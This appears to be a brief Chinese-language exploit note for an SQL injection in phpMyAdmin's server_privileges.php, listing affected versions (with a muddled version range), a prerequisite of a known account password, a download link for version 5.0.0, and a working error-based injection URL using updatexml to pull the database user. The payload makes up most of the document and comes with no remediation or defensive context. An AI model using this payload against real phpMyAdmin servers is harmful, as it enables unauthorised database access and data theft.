影响版本： 4<4.9.4 and 5>5.0.1

前提：已知phpMyadmin的一个用户口令

5.0下载地址：https://files.phpmyadmin.net/phpMyAdmin/5.0.0/phpMyAdmin-5.0.0-english.zip

PAYLOAD:

http://192.168.59.146/phpMyAdmin-5.0.0/server_privileges.php?ajax_request=true&validate_username=true&username=test%27%20and%20(select%20updatexml(1,concat(0x7e,(SELECT%20user()),0x7e),1))%20--%20